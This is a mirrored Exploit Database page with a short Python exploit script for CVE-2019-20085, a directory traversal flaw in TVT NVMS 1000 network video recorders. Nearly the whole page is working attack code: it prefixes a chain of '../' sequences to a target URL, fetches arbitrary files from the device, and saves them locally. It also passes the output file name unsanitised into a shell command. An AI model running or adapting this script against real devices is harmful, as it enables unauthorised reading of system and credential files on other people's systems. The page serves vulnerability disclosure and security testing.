TVT NVMS 1000 – Directory Traversal

• Exploit Database
• 15 阅读

• 作者： Mohin Paramasivam
  日期： 2020-04-13
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/48311/

• # Exploit Title: TVT NVMS 1000 - Directory Traversal 
  # Date: 2020-04-13
  # Exploit Author: Mohin Paramasivam (Shad0wQu35t)
  # Vendor Homepage: http://en.tvt.net.cn/
  # Version : N/A
  # Software Link : http://en.tvt.net.cn/products/188.html
  # Original Author : Numan Türle
  # CVE : CVE-2019-20085
  
  import sys
  import requests
  import os
  import time
  
  if len(sys.argv) !=4:
  	print ""
  	print "Usage : python exploit.py url filename outputname"
  	print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"	
  	print "	"
  else:
  
  
  	traversal = "../../../../../../../../../../../../../"
  	filename = sys.argv[2]
  	url = sys.argv[1]+traversal+filename
  	outputname = sys.argv[3]
  	content = requests.get(url)
  
  	if content.status_code == 200:
  		
  		print " "
  		print "Directory Traversal Succeeded"
  		time.sleep(3)
  		print " "
  		print "Saving Output"
  		os.system("touch " + outputname)
  		output_write = open(outputname,"r+")
  		output_write.write(content.text)
  		output_write.close()
  
  	else:
  
  		print "Host not vulnerable to Directory Traversal!"